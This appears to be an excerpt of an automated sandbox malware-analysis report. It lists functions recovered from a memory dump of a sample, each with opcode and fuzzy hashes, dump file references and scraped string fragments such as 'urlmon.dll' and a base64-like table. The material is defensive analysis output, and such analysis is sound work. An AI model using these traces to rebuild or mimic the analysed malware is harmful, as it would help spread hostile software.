                                                                                                  • API ID: __fassign
                                                                                                  • String ID:
                                                                                                  • API String ID: 3965848254-0
                                                                                                  • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                  • Instruction ID: 28194a3dfc470fb678315caf02e57ff23b3c3bc52870c8b9adf1ee0c02fb5190
                                                                                                  • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                  • Instruction Fuzzy Hash: CA915971D0024AEBDF24DFA9C8456FEB7B4FF55318F24807AD511EA263E7309A818B91

                                                                                                  Executed Functions

                                                                                                  Function 04602666 Relevance: .1, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c3d112355c7b65aec377be5e3f407a1b460c1078adede0e56796cb812b3fd9ed
                                                                                                  • Instruction ID: f4f2fad9720321fa264858b54920da9f3a05b8b9c22f6754a3d3682d3b784cba
                                                                                                  • Opcode Fuzzy Hash: c3d112355c7b65aec377be5e3f407a1b460c1078adede0e56796cb812b3fd9ed
                                                                                                  • Instruction Fuzzy Hash: 9A41D9016583F10ED30E836D08BD675AFC18EA720174EC2EEDADA5F3E3D4848408D3A5
                                                                                                  Function 04601AA2 Relevance: 48.0, Strings: 38, Instructions: 536COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "s$&$)8$.$.$.$;m$?$A$C@$Cr$Fl$G$G#$L$M1$Q$T9$Wi$[$[k$]$]$`$c$e$g$l$l$r$ra$s${$~`$-$E$z${
                                                                                                  • API String ID: 0-1054295309
                                                                                                  • Opcode ID: 65a36a55c771a82fe5cf0e97a2ced832c14231784d84fca66674995da78a0623
                                                                                                  • Instruction ID: abc7be18f7068322966726e31a7b10c9c19655b8424e78cbbe15734922ab54cc
                                                                                                  • Opcode Fuzzy Hash: 65a36a55c771a82fe5cf0e97a2ced832c14231784d84fca66674995da78a0623
                                                                                                  • Instruction Fuzzy Hash: 32627FB0D15229CBEB29CF44C9A8BDEBBB1BF49308F1081D9D5096B281E7756E85CF44
                                                                                                  Function 0460F832 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 6$O$S$\$s
                                                                                                  • API String ID: 0-3854637164
                                                                                                  • Opcode ID: ddadf2530f20be13fdbaf0db4d320aac369c3f8a808d007b434b2ba3987b11f8
                                                                                                  • Instruction ID: 8da009d67c3e9a8834ab1512749ea6059c6bc08b489a3b3241879c29bec559ee
                                                                                                  • Opcode Fuzzy Hash: ddadf2530f20be13fdbaf0db4d320aac369c3f8a808d007b434b2ba3987b11f8
                                                                                                  • Instruction Fuzzy Hash: 5351D3B2D01228ABEB24DF94DD45FEFB378EB54314F108199E90857140F6B56A448FA5
                                                                                                  Function 0461DDA2 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: XT
                                                                                                  • API String ID: 0-1606242382
                                                                                                  • Opcode ID: 67f4f5d27cb569a14e811ea4c5a8c679ae83f84f9d716903cf4240c840fcb08b
                                                                                                  • Instruction ID: 0f539753338c568fdf3cfbbacfed486c7b06476e4a766aaa40d759fbcbcdad46
                                                                                                  • Opcode Fuzzy Hash: 67f4f5d27cb569a14e811ea4c5a8c679ae83f84f9d716903cf4240c840fcb08b
                                                                                                  • Instruction Fuzzy Hash: 651142B2D0121DAF9B00DFA9D8409EFB7F9FF48214F14416AE915E7200F770AA048BA1
                                                                                                  Function 045FB3A8 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dae69ab5ca1d9182f792529412a64e8b27143a2411fcea6ba5fbd9cb2b66894e
                                                                                                  • Instruction ID: de567c4a6836854746cdc3de7e896a662c2bbe6668b51b92e063d4c56a75e0f8
                                                                                                  • Opcode Fuzzy Hash: dae69ab5ca1d9182f792529412a64e8b27143a2411fcea6ba5fbd9cb2b66894e
                                                                                                  • Instruction Fuzzy Hash: 97414FB1D11218AFDB14DF99CC84AEEBBBDFF49710F10415AFA04E6240E7B0A641CBA5
                                                                                                  Function 04620142 Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0525f01588e0980575d949100cdf498856ec3317efb96ac66230ce24626402d
                                                                                                  • Instruction ID: 104641942322d39d25dc4def329472521a5fd4f12d6757146073c269dbb84367
                                                                                                  • Opcode Fuzzy Hash: e0525f01588e0980575d949100cdf498856ec3317efb96ac66230ce24626402d
                                                                                                  • Instruction Fuzzy Hash: 9F31D8B5A00648AFDB14DF98C880EDEB7B9EF8D314F108219FD08A7340E770A951CBA5
                                                                                                  Function 04620062 Relevance: .1, Instructions: 85COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1a19d67413e03ccd299f593aa1bdc07c3198b698cb7db928bcd3febee0e0798e
                                                                                                  • Instruction ID: 53971c7fb34092e8b5c0ecdd3d4257f49ea53749876e22e1d6106768d3c5db9d
                                                                                                  • Opcode Fuzzy Hash: 1a19d67413e03ccd299f593aa1bdc07c3198b698cb7db928bcd3febee0e0798e
                                                                                                  • Instruction Fuzzy Hash: EF311AB5A00648AFDB14DF98CC41EEF77B9EF89304F108119FD08AB240E770A951CBA5
                                                                                                  Function 046209C2 Relevance: .1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39afbcede6fb44affe79b86406fda2f8e9b21315bb83ed72aa0f73e125c1c7b0
                                                                                                  • Instruction ID: cc3c4cf2767db10c6a03c66e5669bf75fc8387f13e5403a26faa617796a8f134
                                                                                                  • Opcode Fuzzy Hash: 39afbcede6fb44affe79b86406fda2f8e9b21315bb83ed72aa0f73e125c1c7b0
                                                                                                  • Instruction Fuzzy Hash: E72119B5A00709ABEB14DF98DC41EEF77B8EF89310F108509F918AB240E770A951CBA5
                                                                                                  Function 0460F672 Relevance: .1, Instructions: 75COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7ae600028ef5d616cbada1f6c2f50b77b38e5eeee70724e629ea44efaa84e6e1
                                                                                                  • Instruction ID: 1bbc1290d5e103356ef58de82e50e0e5d1075817cfa641134286553889f75464
                                                                                                  • Opcode Fuzzy Hash: 7ae600028ef5d616cbada1f6c2f50b77b38e5eeee70724e629ea44efaa84e6e1
                                                                                                  • Instruction Fuzzy Hash: F111C6B23802147BF7309E559C42FAB335C9B95B14F244019FB04AA2C1E6E4F8114BB8
                                                                                                  Function 0461FD02 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a840b1fe716a396293f7e2edb3f4b5af22fa3951aa5333b0456081457e479bd
                                                                                                  • Instruction ID: fac8842c5d6a13b5b8c03f8bd58addff6aeed5e97cec91357f419a62344b8dba
                                                                                                  • Opcode Fuzzy Hash: 5a840b1fe716a396293f7e2edb3f4b5af22fa3951aa5333b0456081457e479bd
                                                                                                  • Instruction Fuzzy Hash: 1A114C71A01704BBE710EF68DC41FAB77B8EB89714F04454AF908AB280E770B951CBA5
                                                                                                  Function 0461FE72 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ffa646a5e8a2cd647588b645ff6674a0a2f64641a523efb6c29990eeafd96f7
                                                                                                  • Instruction ID: 035f0082dbb7e13d096006864a8ade38641a654f294fda00aaac605d2ca32107
                                                                                                  • Opcode Fuzzy Hash: 4ffa646a5e8a2cd647588b645ff6674a0a2f64641a523efb6c29990eeafd96f7
                                                                                                  • Instruction Fuzzy Hash: 0E117F715007147BEB10EF58CC41FEF77A8EB85314F004449F9086B240E6716951CBA5
                                                                                                  Function 0461CA62 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b3ae3d99bbfeba7712c0c361e52a043d066b616ab6fae5f7e76c363dda9cce4d
                                                                                                  • Instruction ID: 3d96fbdbe2f512dbe65b7270c7fa8b110a80b6ed087a10b046b204437e36a7fc
                                                                                                  • Opcode Fuzzy Hash: b3ae3d99bbfeba7712c0c361e52a043d066b616ab6fae5f7e76c363dda9cce4d
                                                                                                  • Instruction Fuzzy Hash: 1C11F1B6D01219AF9B00DFA9D8419EFB7F9FF98210F14415AE919E7200E7705A048BA5
                                                                                                  Function 045FB5BB Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eec4c497c2cddf2a0707d6a48a42e0ed022efe2422529cf8dd0760f6281f064c
                                                                                                  • Instruction ID: 2c7d1788e94d633349ef67e761a5270a8041eef65a39db6d73de4789381d5035
                                                                                                  • Opcode Fuzzy Hash: eec4c497c2cddf2a0707d6a48a42e0ed022efe2422529cf8dd0760f6281f064c
                                                                                                  • Instruction Fuzzy Hash: AE019477F10615CFE7169964EC917F4B754D75A714F0C0526CB41CA189D755F0438781
                                                                                                  Function 045FB403 Relevance: .0, Instructions: 50COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 598a68f136a4abeba4cc11cfa8c09ab18aae4fb16236f2ee67d6b80aa2b39bfd
                                                                                                  • Instruction ID: 165633da29a39d6f1cbb45bf146f416dbdc3bd2e57c12db00297197ef06b045b
                                                                                                  • Opcode Fuzzy Hash: 598a68f136a4abeba4cc11cfa8c09ab18aae4fb16236f2ee67d6b80aa2b39bfd
                                                                                                  • Instruction Fuzzy Hash: 2D110CB1C21229EF8B04DFADD8841DDBBF9FB0C620B10865BE958E7200E77196018FD5
                                                                                                  Function 045FB406 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 016e33bfb0eb6699cd756d00ee287cb175cc7dfcca9f0d9b4296ee006cb0da50
                                                                                                  • Instruction ID: 4697b51c6a38854a771fe561c10af15263caac0d22ad3e9eddeadfbbd0a47a0f
                                                                                                  • Opcode Fuzzy Hash: 016e33bfb0eb6699cd756d00ee287cb175cc7dfcca9f0d9b4296ee006cb0da50
                                                                                                  • Instruction Fuzzy Hash: D411CCB1C21229AFCB44DFADD8845DDBBF9FB0C620B10825BE958E7201E77096418FD5
                                                                                                  Function 04620D32 Relevance: .0, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89dd67c3b39d30c0ff9476ca155eff21d9a433bf1a84ba04fa6fdb7b2beb3cbd
                                                                                                  • Instruction ID: 4845fce5587245fb285f4e00d022456a6f205d8242c12f9c02af82b3f78983dd
                                                                                                  • Opcode Fuzzy Hash: 89dd67c3b39d30c0ff9476ca155eff21d9a433bf1a84ba04fa6fdb7b2beb3cbd
                                                                                                  • Instruction Fuzzy Hash: 910180B2215508BBDB54DE99DC80EEB77ADEF8D754F448109FA09A7240DA30F8518BA4
                                                                                                  Function 0461C9D2 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e30c319fe1a1ba9109ae61a88bc561c9110fbcc62644d764b8081e895aa876ad
                                                                                                  • Instruction ID: 014333d39126ceab79fde333d8434b7170ae9d9f41d89f219d8f94515c7d11dd
                                                                                                  • Opcode Fuzzy Hash: e30c319fe1a1ba9109ae61a88bc561c9110fbcc62644d764b8081e895aa876ad
                                                                                                  • Instruction Fuzzy Hash: 3C01EDB2C11219AFDB40DFE8D8419EEBBF8BF58200F14426ED515F3200F7706A048BA1
                                                                                                  Function 045FB557 Relevance: .0, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 10e9789ecab6ede6214ca682f806531fb8a89ae6c9968cb75a3d9b9017df54dd
                                                                                                  • Instruction ID: 97bc0f24bcc0e4e4232deb3f48e71314d3079483d8d2bbb49110ce2538fa04d8
                                                                                                  • Opcode Fuzzy Hash: 10e9789ecab6ede6214ca682f806531fb8a89ae6c9968cb75a3d9b9017df54dd
                                                                                                  • Instruction Fuzzy Hash: CFF0E9736041065BD7185E5CECC1B9BB78CFB85378F240627E9199B291F676F4118790
                                                                                                  Function 0460F7EB Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 22ba3b4681be8f26fd383fa210af9beafe3c3ed6ebd79333d457e6667363d6b8
                                                                                                  • Instruction ID: 9d0ed7078bad074d4f587412efa555d1571764a207ab1db0894ac5bc3aeff86e
                                                                                                  • Opcode Fuzzy Hash: 22ba3b4681be8f26fd383fa210af9beafe3c3ed6ebd79333d457e6667363d6b8
                                                                                                  • Instruction Fuzzy Hash: 69F0E57224020867F629E7658C42F6AB249CBC4754F088668F80CCB2C2FD6AF51581D2
                                                                                                  Function 0461FF72 Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fed7dea6a141fa50e137687722c1f6b452bce250dc7d4171316395fb8d1c908e
                                                                                                  • Instruction ID: 3836a1d78e17c61a058e77e7792048659c1daa1e5d311724fd0211e585791b86
                                                                                                  • Opcode Fuzzy Hash: fed7dea6a141fa50e137687722c1f6b452bce250dc7d4171316395fb8d1c908e
                                                                                                  • Instruction Fuzzy Hash: A3F08C72200604BBD714EF98DC80EAB77ADEFC9714F008009BA08A7240D630B9218BB0
                                                                                                  Function 04620C52 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 32dfe6accbcac92c60026dbee06412bb375818b1f1b7c978232bd05963374ae2
                                                                                                  • Instruction ID: 600e2ed988456f8e4fa621159bc6614c10876a9b3f868c114d1980f959cbe450
                                                                                                  • Opcode Fuzzy Hash: 32dfe6accbcac92c60026dbee06412bb375818b1f1b7c978232bd05963374ae2
                                                                                                  • Instruction Fuzzy Hash: 85E06D72244605BBD610EE59DC44EAB33ACEFC5714F044019FA08AB241E631BD118BB4
                                                                                                  Function 0460F792 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71fc0f125c82c95c3209582a6703675838755060d63b5d4de9785af8303e528b
                                                                                                  • Instruction ID: b483bdfec1eb2bcad52c7f55d5c0ace37542b263eb95f7b873500f744df5c331
                                                                                                  • Opcode Fuzzy Hash: 71fc0f125c82c95c3209582a6703675838755060d63b5d4de9785af8303e528b
                                                                                                  • Instruction Fuzzy Hash: FEF0A771D0520CEBDB28CF64D841BDEBBB4EB04320F20876EE824DB2C0E634A7508B81
                                                                                                  Function 04622AB2 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3b4a22c58b065d2a11d6fd1e873c8b9c76d9ba54c3b272430b9f827409dc3023
                                                                                                  • Instruction ID: 8b82c7f38541a24d99bd4a5f21271fd28f9296c866f806aad23ffb0595768507
                                                                                                  • Opcode Fuzzy Hash: 3b4a22c58b065d2a11d6fd1e873c8b9c76d9ba54c3b272430b9f827409dc3023
                                                                                                  • Instruction Fuzzy Hash: 7EE04F7660162437D23059899D05F9B779C8BD5A60F050068FE189B344F565B90146E8
                                                                                                  Function 04620922 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4b864608f4a2eb31d8f0a05db5f8acc81fa7b699acff56dad44a4274dd25857
                                                                                                  • Instruction ID: f0fe5d36c0e718609f63fe7c46fe4e9f2b654cda65abba3cfe37784adcb4f661
                                                                                                  • Opcode Fuzzy Hash: b4b864608f4a2eb31d8f0a05db5f8acc81fa7b699acff56dad44a4274dd25857
                                                                                                  • Instruction Fuzzy Hash: F3E046322006147BE620BB6ADC40EDB776CEBC6714F548019FA48AB240D7B1BD1987B1
                                                                                                  Function 04602686 Relevance: .0, Instructions: 10COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8104789ef33d30e626fa46bc78122528ae7778da7a59c4d6cf89fd4278b21d7d
                                                                                                  • Instruction ID: 53716569de1f404a76770f39801fc4865d5f04dc6b9ecf2592315cb775d7f40e
                                                                                                  • Opcode Fuzzy Hash: 8104789ef33d30e626fa46bc78122528ae7778da7a59c4d6cf89fd4278b21d7d
                                                                                                  • Instruction Fuzzy Hash: BEC02B032240D812DE44BF4431781A26101EED23203B881C5C0046FACB7801DC91A112

                                                                                                  Non-executed Functions

                                                                                                  Function 0460B5DD Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  • Opcode ID: 853743c5ecc134d98d9c882dab8fdf6cdc0ab1d3fcb0a7c8eea83fe58d735bf9
                                                                                                  • Instruction ID: 2f96a01ac3cc7546151e6adcdae67d55535d57fe24048dbd269f78ea6a84a904
                                                                                                  • Opcode Fuzzy Hash: 853743c5ecc134d98d9c882dab8fdf6cdc0ab1d3fcb0a7c8eea83fe58d735bf9
                                                                                                  • Instruction Fuzzy Hash: 1F910EF08042998ACB118F95A4603DFBF71BB95204F15C1E9C6AA7B243C3BE4E45DF90
                                                                                                  Function 04619F92 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                  • API String ID: 0-1002149817
                                                                                                  • Opcode ID: 0cf01968fb0416cde34f274ef9e651dcd790f2ac07a296d84fb1e87a13ffa15e
